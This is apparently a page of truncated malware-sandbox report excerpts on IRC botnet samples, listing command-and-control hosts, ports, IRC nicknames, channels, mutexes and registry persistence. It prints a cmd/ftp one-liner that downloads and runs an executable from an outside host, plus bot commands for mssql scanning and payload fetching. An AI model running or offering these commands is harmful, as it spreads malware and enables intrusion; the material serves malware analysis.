Author: Pig

Remote Host Port Number 199.71.214.54 8160 NICK {USA-XP}822917 MODE {USA-XP}822917 -ix JOIN #Test1# USER kztgfpt * 0 :COMPUTERNAME PRIVMSG #Test1# : NEW MoFkN WebGrab! Other details * The following port was open in the system: Port Protocol Process 1052 TCP svhost.exe (%Windir%svhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + MSNRead more...

Connecting to 213.229.67.216 (6651)

Remote Host Port Number g00000000.inluver.com 47221 Other details * To mark the presence in the system, the following Mutex object was created: o fftx81iciiibat * The following ports were open in the system: Port Protocol Process 1034 TCP jjdrive32.exe (%Windir%jjdrive32.exe) 1036 TCP jjdrive32.exe (%Windir%jjdrive32.exe) * The following Host Name was requested from a host database:Read more...

browseusers.myspace.com browseusers.myspace.com 216.178.38.168 x.myspacecdn.com x.myspacecdn.com 212.201.100.133 myspace.ivwbox.de myspace.ivwbox.de 193.46.63.103 cms.myspacecdn.com cms.myspacecdn.com 212.201.100.141 www.google-analytics.com www.google-analytics.com 209.85.135.139 js.myspacecdn.com js.myspacecdn.com 212.201.100.142 qs.ivwbox.de qs.ivwbox.de 193.46.63.90 pagead2.googlesyndication.com pagead2.googlesyndication.com 209.85.129.164 googleads.g.doubleclick.net googleads.g.doubleclick.net 209.85.129.155 b.myspace.com b.myspace.com 63.135.80.58 c1.ac-images.myspacecdn.com c3.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com 212.201.100.144 c3.ac-images.myspacecdn.com 212.201.100.142 c2.ac-images.myspacecdn.com c4.ac-images.myspacecdn.com c2.ac-images.myspacecdn.com 212.201.100.133 c4.ac-images.myspacecdn.com 212.201.100.135 delb.opt.fimserve.com desk.opt.fimserve.com delb.opt.fimserve.com 63.135.86.39 desk.opt.fimserve.com 63.135.86.23 cache.fimservecdn.com cache.fimservecdn.com 212.201.100.133 mys-de.sensic.net mys-de.sensic.net 62.48.71.30 ad.doubleclick.netRead more...

die.itsinthediddle.info 6667 cmd /c echo open pornhq.dynalias.com 8989 > i&echo user upload upload >> i &echo binary >> i &echo get /dn.exe >> i &echo quit >> i &ftp -n -s:i &dn.exe sub domain vids.itsinthediddle.info 78.47.176.189:9595 Nick: AUT[XP|SP3]00[L]283645 Username: alI-avytrwzq Joined Channel: #!nZm with Password Channel Topic for Channel #!nZm: “.scan.start mssql 40 6 0Read more...

edsux.shadow-mods.net 91.121.78.121:6532 Nick: [AUT|00|P|58582] Username: XP-5048 Server Pass: Joined Channel: #notwelcome# with Password TGJ Channel Topic for Channel #notwelcome#: “$asc -S -s|$sftp 66.76.203.197 4545 blah45 blah45 ic.exe|$asc svrsvc_all 50 3 0 -e -b -r -s”

* There was registered attempt to establish connection with the remote host. The connection details are: Remote Host Port Number z00000000.inluver.com 47221 There was an outbound traffic produced on port 47221: 00000000 | 5041 5353 206C 6574 6D65 696E 0D0A 4E49 | PASS letmein..NI 00000010 | 434B 205B 4E30 305F 5553 415F 5850 5F35 |Read more...

NICK [BHH|XP|US|700438][v5] USER BHH700438 700438 COMPUTERNAME :[BHH|XP|US|700438][v5] JOIN #InItTogether Other details * The following Host Name was requested from a host database: o fluffy.jessicadube.com Memory Modifications * There were new processes created in the system: Process Name Process Filename Main Module Size services.exe %Temp%services.exe 262 144 bytes [filename of the sample #1] [file and pathnameRead more...

pics09.itsinthediddle.info DNS_TYPE_A 116.80.220.158 YES udp 116.80.220.158:9595 Nick: {NEW}[AUT][XP]494868 Username: 0652 Joined Channel: #!sw

Resolved : [here.virtual-rejectz.com] To [70.91.45.236] Resolved : [here.virtual-rejectz.com] To [66.178.131.99] here.virtual-rejectz.com:9000 Joined Channel: ##indi Joined Channel: ##deadmeat##